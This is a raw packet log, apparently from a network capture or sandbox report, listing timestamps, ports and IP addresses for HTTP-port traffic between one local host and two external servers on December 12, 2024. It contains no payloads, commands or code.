Dec 12, 2024 16:48:46.275341034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.329834938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.329862118 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.330389023 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.332214117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.332277060 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.332425117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.336652994 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.336733103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.336774111 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.336802006 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.341273069 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.341296911 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.341411114 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.345884085 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.346051931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.346075058 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.346194029 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.350234985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.350974083 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.351344109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.351392031 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.354492903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.355125904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.355129957 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.355253935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.358573914 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.358679056 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.359201908 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.362509012 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.362799883 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.363162041 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.363276005 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.366569996 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.366627932 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.366671085 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.366671085 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.370232105 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.370387077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.370404005 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.370446920 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.373908043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.373997927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.375935078 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.376317024 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.377702951 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.377954960 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.378627062 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.378813028 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.379681110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.380136967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.380142927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.380244017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.380270004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.380465984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.381264925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.381375074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.381380081 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.381479979 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.381654024 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.381874084 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.382083893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.382179022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.382186890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.382280111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.383147955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.383912086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.384094954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.384176970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.384399891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.384689093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.384982109 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.385176897 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.385184050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.385219097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.385323048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.385433912 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.386200905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.386332989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.386445999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.387281895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.387636900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.387732983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.388305902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.388715982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.388721943 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.388729095 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.388813972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.389252901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.389313936 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.389420033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.389513969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.390326023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.390618086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.390733957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.391304970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.391942024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.392131090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.392260075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.392426014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.392432928 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.392509937 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.392509937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.392529011 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.392576933 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.393362999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.393688917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.393830061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.394503117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.394509077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.394758940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.395582914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.395804882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.395925045 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.396433115 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.396615982 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.396653891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.396658897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.396760941 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.396797895 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.397557974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.397659063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.397737026 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.398483992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.398617029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.398693085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.399422884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.399854898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.399859905 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.399888039 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.399980068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.400432110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.400618076 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.401495934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.401500940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.401506901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.401599884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.402426958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.403410912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.403512001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.403537989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.403543949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.403593063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.403599024 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.403601885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.403641939 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.404454947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.404558897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.404781103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.405476093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.405776024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.405854940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.406558037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.406563997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.406658888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.407279015 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.407334089 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.407501936 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.407516956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.407603979 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.407613039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.407700062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.408560991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.408567905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.408694029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.409517050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.410106897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.410303116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.411019087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.411025047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.411035061 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.411048889 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.411139011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.411567926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.411653042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.411706924 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.411740065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.412587881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.412839890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.412990093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.413595915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.414504051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.414587975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.414621115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.414628029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.414709091 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.414715052 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.414719105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.414931059 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.415632010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.415769100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.415848017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.416636944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.417665958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.417673111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.417697906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.417809963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.418406010 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.418682098 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.418687105 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.418688059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.418694973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.418812037 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.419739008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.419835091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.419881105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.419955969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.420753002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.420758963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.420881033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.421706915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.421916008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.422022104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.422117949 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.422576904 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.422754049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.422760010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.422806025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.422858000 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.422897100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.423749924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.423947096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.424048901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.424745083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.425858974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.425863981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.425875902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.425880909 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.425887108 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.425971031 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.426017046 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.426017046 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.426809072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.427190065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.427278996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.427999020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.428344965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.428838015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.428917885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.429414988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.429544926 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.429757118 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.429832935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.429857969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.430078030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.430912018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.430917025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.430979967 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.431025982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.431866884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.431926966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.432034969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.432907104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.433317900 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.434329033 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.434782028 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.437182903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.437225103 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.437412024 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.437470913 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.478481054 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.521888018 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.522150040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.522171021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.522229910 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.523353100 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.523469925 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.523547888 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.523643017 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.526319027 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.527338028 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.527359009 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.527642012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.527895927 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.528150082 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.530242920 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.530431986 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.530715942 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.531342030 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.533226967 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.533855915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.535351992 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.535912991 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.537301064 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.538682938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.539335966 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.539413929 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.539638996 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.541380882 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.541491032 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.541503906 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.541539907 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.544019938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.544503927 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.546659946 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.546822071 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.546885014 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.546885014 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.549149990 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.549215078 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.551659107 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.551717997 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.551815033 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.552720070 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.554229975 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.554335117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.555530071 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.555707932 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.556754112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.557015896 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.557034969 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.557132959 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.559247017 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.559336901 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.559984922 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.560060024 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.561692953 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.561698914 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.561949968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.564404964 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.564558029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.564595938 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.565512896 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.566569090 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.567337036 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.567714930 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.568205118 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.568792105 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.568881989 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.569107056 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.569264889 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.571187973 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.571324110 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.571357965 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.571491957 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.572235107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.572496891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.572618961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.572715044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.572876930 CET	80	49946	185.81.68.147	192.168.2.10
